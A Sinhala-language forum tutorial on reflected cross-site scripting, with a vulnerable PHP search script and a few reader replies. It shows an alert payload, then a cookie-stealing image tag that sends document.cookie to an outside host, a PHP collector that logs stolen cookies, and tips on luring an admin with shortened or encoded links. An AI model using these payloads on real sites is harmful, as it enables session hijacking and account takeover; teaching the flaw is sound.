ඔබ තවමත් Widane Forums සාමාජිකයෙක් නෙවෙයි ද..?

Widane Forums හි සියළුම ලිපිවල ඇති සියළුම Links වෙත පිවිසීමට නම් ලියාපදිංචිවීම අනිවාර්යයි.
ඔබගේ සියලුම තාක්ෂණික ගැටළු සඳහා විසඳුම් සොගැනීමට වගේම දැනුම බෙදාගැනීම සඳහා මෙහි ඉඩකඩ වෙන්කර තිබෙනවා.
ඉතින් ඇයි තවත් බලාගෙන ඉන්නේ ඉක්මනින් ලියාපදිංචිවී ඔබගේ දැනුම වැඩිකරගන්න.

Register Here




[Tut] Reflected XSS tutorial
#1
Wink 
Hello guys,
ඔන්න අවුරුදු තුනකට විතර පස්සේ ආයෙත් සිංහල ටියුට් එකක් ලියන්න පටන් ගත්තා . මේකෙන් මන් කතා කරන්න යන්නෙ Cross Site Scripting වල එක කොටසක් ගැන. මේ Reflected  Cross Site Scripting. මේ වුල්නරබිලිටි එක ගොඩක් අය හිතන්නේ  අඩු රිස්ක් එකක් තියෙන වුල්නරබිලිටි  එකක් කියලා තමා. හරි අපි කොහොමහරි මේකෙන් වෙන්නෙ මොකක්ද කරන්න පුලුවන් මොනවද ඔය ඔක්කොම ඉගෙන  ගන්න ට්‍රයි එකක් දෙමු.
මුලින්ම බලමු මේකට අදාල තියරි පාර්ට් එක.
අපි හිතමු පල්ලෙහා තියෙන  විදිහේ වෙබ් ඇප්ලිකේශන් එකක් තියෙනවා. මේකෙන්  යූසර්ගෙන් මොකක් හරි ඉන්පුට් එකක් ඇරගෙන ඒක මොනවහරි  ක්‍රියාවලියකට ලක් කරලා අපිට අවුට්පුට් එකක් දෙනවා. අපි බලමු මේකෙ කෝඩ් එක මොන වගේද කියලා.


Server side part

<?php 
include find.php

if(isset$_GET['string']){
   str =  $_GET['string']
   $results = array()

   if (findItems(str)) {
      echo "We have following  items for your keyword";
      foreach ($results as $item) {
        echo "$item <br>";
      }
   } else {
        echo "Found nothing for your keyword" . str . "!" ;
   }
}
?>



අපි හිතමු ඔය php ස්ක්‍රිප්ට් එක widane.com එකේ හොස්ට් කරලා තියෙනවා කියලා. එතකොට ඒකේ URI එක widane.com/find.php වගේ කියලත් උපකල්පනය කරමු. මන් කෙටියෙන් පැහැදිලි කරන්නම් මේ ස්ක්‍රිප්ට් එකෙන් වෙන දේ.

මුලින්ම මේකෙන් බලන්නේ URL එකේ str කියලා පැරාමීටර් එක්ක් තියෙනවාද  කියන එක. එහෙම parameter එකක් තියෙනවානම් ඒක str කියන variable එකට assign කරනවා.( සරලව හිතන්න සමාන කරනවා කියලා).
ඊළඟට කරන්නේ findItems() කියන ෆන්ක්ශන් එකෙන් යූසර් ඉන්පුට් කරන keyword" එක සර්ච්කරන එක. මේ වර්ඩ් එකට අදාල අයිටම් තියෙනවනම් ඒවා අවුට්පුට් කරනවා. සර්ච් රිසාල්ට්ස් මොනවත් නැත්නම් එරර් මැසේජ් එකක් එක්ක යූසර් ඉන්පුට් කරපු key word එකත් ඩිස්ප්ලේ වෙනවා.

ඉතින් මෙතන තියෙන වැරැද්ද /වුල්නරබිලිටි  එක මොකක්ද? . මෙතන ඇප්ලිකේශන්  එකෙන් වෙන්න ඕනෙ දේ හරියටම වෙනවා. ඒත් මෙතනදි යූසර් ඉන්පුට් කරන string එක කිසිම ෆිල්ටර් කිරීමක් වෙන්නෙ නෑ. අපි ඉන්පුට් කරන ඕනෙම විදිහෙ ස්ට්‍රින්ග් එකක් ආපහු අවුට්පුට් කරනවා ඒකට අදාල අයිටම්ස් නැත්නම්. මේ Vulnerability එකට අපි කියනවා Cross Site Scripting කියලා.

Inject a JavaScript

දැන් අපි බලමු මේකෙන් කරන්න පුලුවන්  මොනවද කියලා. XSS කියපු ගමන්ම මතක් වෙන්නේ ඉතින් Alert box එකක්නේ. මුලින්ම බලමු ඒක වෙන්නෙ  කොහොමද කියලා. මන් නෙහෙම දෙයක් ඉන්පුට් කරොත් මොකද වෙන්නෙ ?


<script>alert('XSS')</script>


දැන් අපේ URL එක මේ වගේ  වෙනවා .

widane.com/find.php?str=<script>alert('XSS')</script>



PHP කෝඩ් එකෙන් අපේ str parameter එක අරගෙන ඒකට අදාල අයිටම්ස්  නැති නිසා එරර් මැසේජ් එකත් එක්ක ඔය ඉන්පුට් එකත් අවුට්පුට් කරනවා.

Found nothing for your keyword  <script>alert('XSS')</script>  !



මේක බ්‍රවුසර් එකට ආපු ගමන් ඒකෙන් <script> හා </script> ඇතුළත තියෙන ඕනෙම දෙයක් දකින්නේ සාමාන්‍ය  JavaScript කෝඩ් එකක් විදිහට. ඉතින් බ්‍රවුසර්  එකෙන් දෙපාරක් හිතන්නෙ නැතුව මේ කෝඩ් එක execute කරනවා.

[Image: t2MFHgvl.png]

What else we can do?

දැන් ත්ව ප්‍රශ්නයක් තියෙනවා .xss වලින් කරන්න පුලුවන් ඔය ටික විතරද? නෑ තව ගොඩක් Payloads තියෙනවා. මේවගෙන් ගොඩක් malicious Payload එකක් තමා session hijacking කියන එක. මෙතනදි වෙන්නේ victim ගේ session එක අපි පාවිච්චි කිරීමක් .ගොඩක් වෙලාවට කරන්නේ cookie එක steal කරන එක තමා. මම සරල විදිහට මේක පැහැදිලි කරොත් වෙන්නේ මෙහෙම දෙයක්. හිතන්න මට මේ සයිට් එක ඩිෆේස් කරන්න ඕනෙ. මම මේක විසිට් කරනකොට දකිනවා අර උඩ තිබ්බ වෙබ් පේජ් එක. ඒකෙන් යූසර් ඉන්පුට් එකක් ගන්නවා. වෙබ් ඇප්ලිකේශන්  එකක වුල්නරබිලිටි එකක් තියෙන්න ලොකුම ඉෆක් තියෙනවා මේ ඉන්පුට් ෆන්ක්ශන් වල. ඉතින් මන් jddjsjj"<> වගේ random ස්ට්‍ර්රින් එකක් ගහලා බලනවා. මෙතනදි මන් දකිනවා යූසර් ඉන්පිට් එක ෆිල්ටර් කරන්නේ නැතුව අවුට්පුට් කරනවා.දැන් මට මේකෙන් සයිට් එක ඩිෆේස් කරන්න ට්‍රයි කරන්න පුලුවන්. (මෙහෙම වුල්නරබිලිටි එකක් දැක්ක ගමන් කරන්න ඕනෙ මේක stored  xss වලට හරි RCE වලට වගේ හරවගන්න පුලුවන්ද කියලා. මන් ඒ ගැන මෙතනදි කතා කරන්න යන්නේ නෑ.)

මට කොහොමහරි ඇඩ්මින් කෙනෙක්ගේ cookie  එකක් ගන්න පුලුවන්න්ම් මගේ browser එකේ cookie  වෙනුවට අර ගත්ත එක රීප්ලේස් කරලා session එක hijack කරන්න පුලුවන්.
<img src=”http://hacksland.net/catch.php?cookie =”+document.cookie>


දැන් අපේ සම්පූර්ණ payload එක මේ වගේ එකක්.

widane.com/find.php?str=<img src=”http://hacksland.net/catch.php?cookie =”+document.cookie>



මට දැන් කරන්න තියෙන්නේ කවුරු හරි ඇඩ්මින් කෙනෙකුට ඔය url දෙන එක. එක්කො මට tinyurl වගේ සර්විස් එකක් යූස් කරලා ඕක short කරලා දෙන්න පූවන්. ඒ වගේම url encoding යූස් කරලත් සැක හිතෙන එක අඩු කරන්න පුලුවන්. අපි උපකල්පනය කරමු මේකෙ ඇඩ්මින් කෙනෙක් ඔය වගේ URL එකක් විසිට් කරන්න තරම් මෝඩ උනා කියලා. දැන් මට කරන්න තියෙන්නෙ මගේ සර්වර් එකේ තියෙන catch.php එකෙන් අර cookie එක අරගෙන මගේ browser එකට ඉන්ජෙක්‍ට් කරන එක. ඒක කරන්න add-ons තියෙනවා.

<?php
$cookie = $_GET[“cookie”];
$file = fopen(“data.txt”, “a”);
fwrite($file, $cookie .”\n”);
fclose($file);
?>



තව විදිහක් තියෙනවා මේ විදිහේ ඇටෑක් එකක් කරන්න. අපිට පුලුවන් මගේ සයිට් එකේ වෙනම පේජ් එකක් හදන්න. මන් ඒකෙ img ටැග් එකක් දාලා ඒකෙ src විදිහට දානවා අපේ ඔය url එක. එතකොට වික්ටිම් අපේ ලින්ක් එක මැනුවලි click කරන්න ඕනේ වෙන්නෙ නෑ.




මෙතන අපැහැදිලි තැන් ටිකක් තියෙනව කියලා මන් හිතනවා. එකක් තමා අපි මොකටද cookie එක steal කරන්න victim සයිට් එකම යූස් කරන්නෙ? ඇයි අපිට බැරි  එක අපේ සයිට් එකේම JavaScript එකක් රන් කරලා cookie ගන්න? මේ  දේවල් ටියුට් එකේම කතාකරනවාට වඩා හොඳයි live conversation එකක් විදිහට යන එක. එතකොට හැමෝම දන්න නොදන්න දේවල් එකතු කරන්න පුලුවන්. 

ඇත්තටම mybb වගේ software එකක් ඇටෑක් කරන එකනම් මේතරම් ලේසි නෑ. මන් මේක පැහැදිලි කන්න උදාහරණයක් විදිහට තමා මේක ගත්තේ. කට්ටිය මොනවා හරි දෙයක් ඉගෙන ගන්න ඇති කියලා හිතනවා. තව් ටියුට් ඕනේ මාතෘකා තියෙනවානම් කමෙන්ට් එකක් දාන්න.
B.Sc Engineering Student
gov. university of Pera.
Admin At HacksLand.net
#2
XXE, SSRF

වටිනව මචන්
Damn.. There's a little bit of devil in her angel eyelove love

Reply
#3
Supiri bn, thanks
Reply
#4
adugane meke thiyena varaddakvath kiyapallako bn. :-p . aluth deval share karagannanm comment tikak dapiyavu nikamma inne nathuva. hamoma danna nodanna dewal igena ganna puluvan ethakota. forum ekak kiyanne ehemane. :-)
B.Sc Engineering Student
gov. university of Pera.
Admin At HacksLand.net
Reply
#5
තෑම්ස් සින්හලෙම් ලියුවට
Reply
#6
එලම.. සෑහෙන්න වටිනව...
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
Star [Tut] Pen-testing tutorial - 002 [තේරෙන සිංහලෙන්] | SQL injection Elite_x 20 6,239 12-29-2019, 01:33 PM
Last Post: Sha2nn
Star [Tut] Pen-testing tutorial - 003 [තේරෙන සිංහලෙන්] | Login Bypass - Video Tutorial Elite_x 2 1,121 11-25-2019, 02:22 PM
Last Post: dhanujathishakya
Star [Tut] Pen-testing tutorial - 003 [තේරෙන සිංහලෙන්] | Login Bypass Elite_x 13 4,448 10-14-2019, 12:07 PM
Last Post: Lord Mansara
Star [Tut] Pen-testing tutorial - 001 [තේරෙන සිංහලෙන්] Elite_x 14 6,066 01-29-2019, 01:02 PM
Last Post: OWL99



Users browsing this thread: 1 Guest(s)